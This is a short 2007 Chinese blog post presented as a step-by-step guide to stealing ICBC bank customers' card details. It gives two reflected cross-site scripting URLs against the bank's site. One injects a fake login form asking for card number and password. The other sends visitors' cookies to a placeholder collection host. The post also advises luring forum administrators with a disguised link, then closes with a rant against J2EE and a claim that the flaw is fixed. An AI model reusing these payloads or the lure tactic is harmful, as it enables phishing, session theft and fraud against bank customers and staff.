图片
文章内容
沈崴手把手教你如何获取别人工行银行卡
eishn 2007-01-08
严正申明: 经过寻找, 我终于找到了这个漏洞最初的发现者谢先明先生, 这是一位非常善良的技术人员, 请大家支持他的博客。预知整件事情的来龙去脉请访问 http://blog.csdn.net/hcat1999/archive/2006/12/31/1470770.aspx 。本文纯属借题发挥。
伪造页面 (同事老庄友情提供)
http://www.icbc.com.cn/news/hotspot.jsp?column=%B1%BE%D0%D0%BC%B4%BD%AB%C6%C6%B2%FA%A3%AC%C7%EB%C1%A2%BF%CC%B5%C7%C2%BD%D7%AA%D2%C6%C4%FA%B5%C4%B2%C6%B2%FA%3Cbr%3E%B9%A4%C9%CC%D2%F8%D0%D0%BF%A8%BA%C5%A3%BA%3Cinput%20name=a%20/%3E%3Cbr%3E%C4%FA%B5%C4%C3%DC%C2%EB:%3Cinput%20name=e/%3E%3Cbr%3E%3Cinput%20type=button%20value=%B5%C7%C2%BD%3E
直接发送跳板帐号 (不要有任何侥幸心理了)
http://www.icbc.com.cn/news/hotspot.jsp?column=%3Cscript%3Ewindow.location='http://127.0.0.1/crack/'%2BencodeURIComponent(document.cookie)%3C/script%3E
下一步
接下来呢? 我们就该到工行的 网上论坛 向管理员和各位用户发表一下我的见解了。当然, 得更隐蔽些。
"管理员啊, 网站上的这个说明是什么意思啊 http://www.icbc.com.cn/icbcmodule/thirdindex.jsp?column=%XXX..."
还记得上一篇《沈崴手把手教你获得别人网易博客权限》的文章吗? 有很多共通之处, 可供参考。
我的申明
事实上, 我并不是所谓的骇客, 我只是每当看到没有技术含量的东西绝不放弃冷嘲热讽的机会, 比如 "J2EE"。多少关键业务在使用这些低效的技术? 多少学生被这些买办误导和愚弄? 我就是要拆穿这些过时技术的谎言, 只要你一天没有结束和内存泄露、永无休止的 XML 配置以及设计模式软件工程的搏斗, 依然跟着国内所谓的 Win32 专家亦步亦趋, 你永远没有时间来提高你的软件的安全性。
在 Plone 下, 你有机会写出不安全的程序吗? 你不妨试试。
最后我想告诉所有有志于此道的小屁孩一个坏消息, 某人已经将问题向工行网站反映, 工行迅速作出了修复, 请勿以身试法。